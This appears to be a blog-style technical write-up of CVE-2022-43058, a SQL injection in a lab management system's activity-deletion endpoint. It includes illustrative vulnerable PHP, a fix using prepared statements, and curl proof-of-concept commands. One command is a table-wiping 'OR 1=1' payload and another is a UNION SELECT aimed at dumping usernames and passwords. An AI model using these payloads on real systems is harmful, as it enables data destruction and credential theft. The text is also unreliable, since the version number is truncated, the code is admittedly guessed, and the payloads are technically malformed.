CVE-2022-43058 - SQL Injection in Online Diagnostic Lab Management System v1. – Technical Analysis and Exploit Guide

In October 2022, a critical SQL injection vulnerability was identified in the Online Diagnostic Lab Management System (ODLMS) v1.. Tracked as CVE-2022-43058, this vulnerability allows a remote attacker to execute arbitrary SQL commands on the backend database. The vulnerability lies in the way the system processes the id parameter in the delete_activity function, potentially exposing sensitive information or enabling data manipulation.

This post digs into the technical details, showcases proof-of-concept code, provides references, and explains how the exploit works using simple terms.

Version: 1.

- Vulnerable Path: /odlms/classes/Master.php?f=delete_activity

Technical Background

SQL injection is a well-known attack vector that occurs when user input is not properly sanitized and is directly included in a SQL query. When this happens, an attacker can manipulate the database query by sending specially crafted parameter values.

In the case of ODLMS v1., the following API call is vulnerable

/odlms/classes/Master.php?f=delete_activity&id={USER_INPUT}

The id parameter is directly used in an SQL statement without sanitization, opening the door for attackers.

Vulnerable Code (Simplified Example)

While the exact code inside Master.php is not public, vulnerable PHP scripts typically look like this:

// Potential vulnerable code inside Master.php
if ($_GET['f'] == 'delete_activity') {
    $id = $_GET['id'];
    // Unsafe: $id is used directly in the SQL statement
    $sql = "DELETE FROM activities WHERE id = $id";
    $result = mysqli_query($conn, $sql);
    // ...
}

This code does not validate or escape $id, so if an attacker sends id=1 OR 1=1, the query becomes:

DELETE FROM activities WHERE id = 1 OR 1=1

This will delete all records in the activities table.

Proof of Concept (PoC)

An attacker can exploit this with a simple browser or tools like curl or Burp Suite.

PoC with Curl

curl "http://targetsite.com/odlms/classes/Master.php?f=delete_activity&id=%20OR%201=1";

Suppose someone wants to dump the first username in the users table (table name assumed)

curl "http://targetsite.com/odlms/classes/Master.php?f=delete_activity&id=%20UNION%20SELECT%201,username,password%20FROM%20users%20LIMIT%201--+";

Depending on the SQL error messages or how output is handled, information can be revealed.

Example Fix (PHP - MySQLi Prepared Statement)

if ($_GET['f'] == 'delete_activity') {
    $id = intval($_GET['id']);
    $stmt = $conn->prepare("DELETE FROM activities WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
}

References

- NVD – CVE-2022-43058
- Exploit Database Entry (if/when available)
- Basics of SQL Injection – OWASP
- How to Prevent SQL Injection in PHP

Conclusion

CVE-2022-43058 is a dangerous SQL injection vulnerability in ODLMS v1.’s activity deletion endpoint. Even basic exploitation can lead to full database compromise or total data loss. All affected users should update and sanitize their code right away.

Always treat user input as untrusted and use best practices like prepared statements to prevent SQL injection.

*If you found this guide helpful, consider sharing it to raise awareness about secure coding!*

Timeline

Published on: 11/09/2022 21:15:00 UTC
Last modified on: 11/10/2022 14:22:00 UTC